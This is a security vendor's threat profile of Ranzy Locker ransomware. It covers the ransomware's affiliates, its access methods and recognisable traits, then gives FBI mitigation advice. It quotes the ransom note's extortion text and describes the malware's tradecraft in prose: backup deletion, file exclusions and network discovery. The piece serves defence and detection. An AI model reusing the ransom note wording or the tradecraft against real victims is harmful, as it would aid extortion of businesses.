Ranzy Locker ransomware emerged in late 2020, when the variant began to target victims in the United States. According to a flash alert issued by the FBI, unknown cyber criminals using Ranzy Locker ransomware had compromised more than 30 US businesses as of July 2021, including victims in the construction, academic, government, IT, and transportation sectors. Ranzy Locker is a successor of ThunderX and AKO ransomware.

Ransomware-as-a-Service 

The group behind Ranzy Locker is not very different in its business approach from other “big game” ransomware gangs. The ransomware is made available using the Ransomware-as-a-Service (RaaS) model, which allows the developers to profit from cybercriminal affiliates who deploy it against victims. It also runs a leak site where data stolen from victims who refuse to pay a ransom is published.

RDP again, and Exchange

Where the business model is no surprise, the same can be said about the attack methods that Ranzy Locker affiliates deploy to gain initial access. According to the same FBI alert a majority of victims reported that the threat actors conducted brute force attacks targeting Remote Desktop Protocol (RDP) credentials to gain access to the victims’ networks. Recent targets reported the actors leveraged known Microsoft Exchange Server vulnerabilities and phishing as the means of compromising their networks. 

Older, and now less frequent attack methods included malicious spam, and use of the RIG exploit kit, which was previously used to spread Princess ransomware. 

Recognizing Ranzy Locker 

So, how can you tell whether you have been hit by Ranzy Locker or one of the other, many, ransomware variants out there? Well, for starters you can tell from the header of the ransom note which is named readme.txt

---=== Ranzy Locker 1.1 ===---

Attention! Your network has been locked.
Your computers and server are locked now.
All encrypted files have extension: .ranzy

---- How to restore my files? ----

All files on each host in your network encrypted with strongest encryption algorithms
Backups are deleted or formatted, do not worry, we can help you restore your files

Files can be decrypted only with private key - this key stored on our servers
You have only one way for return your files back - contact us and receive universal decryption program

Do not worry about guarantees - you can decrypt any 3 files FOR FREE as guarantee

Some variants also use file extensions for the encrypted files that show Ranzy Locker was at work. Those extensions are .RNZ, .ranzy, and .RANZYLOCKED, but there are also some that are less helpful and add a random 6 character string. 

Behavior 

A typical series of actions performed Ranzy Locker ransomware is: 

  • Find and delete shadow volume copies, and other recent backups, and disable the Windows recovery environment. 
  • Run the encryption process but skip files that have .exe, .dll, .sys, .ini, .lnk, .key, .rdp extensions; and exclude paths with strings including AppData, bootPerfLogsPerfBoot, Intel, Microsoft, Windows and Tor Browser
  • Look for connected machines on the network.
  • Drops the ransom note on the desktop of the affected system. 

From what we have noticed, the double-extortion tactic—encrypting and exfiltrating data—is only used on some victims, probably depending on the size of the company and the type of data that was stolen. 

Mitigation 

Based on the behavior of Ranzy Locker, the FBI recommends the following mitigation strategies: 

  • Store regular backups of your data off-site and offline, where attackers can’t reach them.
  • Implement network segmentation, so that an attacker can’t reach all the machines on your network from one compromised foothold.
  • Install and regularly update anti-malware software on all hosts and enable real-time detection. 
  • Install security updates for software, operating systems, and firmware as soon as they are released.
  • Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.  
  • Audit user accounts with administrative privileges and configure access controls with least privilege in mind. Do not give all users administrative privileges.
  • Disable unused remote access ports and monitor remote access logs for any unusual activity.  
  • Consider adding an email banner to emails received from outside your organization.  
  • Disable hyperlinks in received emails.
  • Use double authentication when logging into accounts or services.

We would like to add Brute Force Protection to that list. 

IOCs 

Besides the characteristics mentioned in this post, the FBI points to a sample YARA rule for Ranzy Locker, which can be found here.

 Stay safe, everyone! 

The post Threat profile: Ranzy Locker ransomware appeared first on Malwarebytes Labs.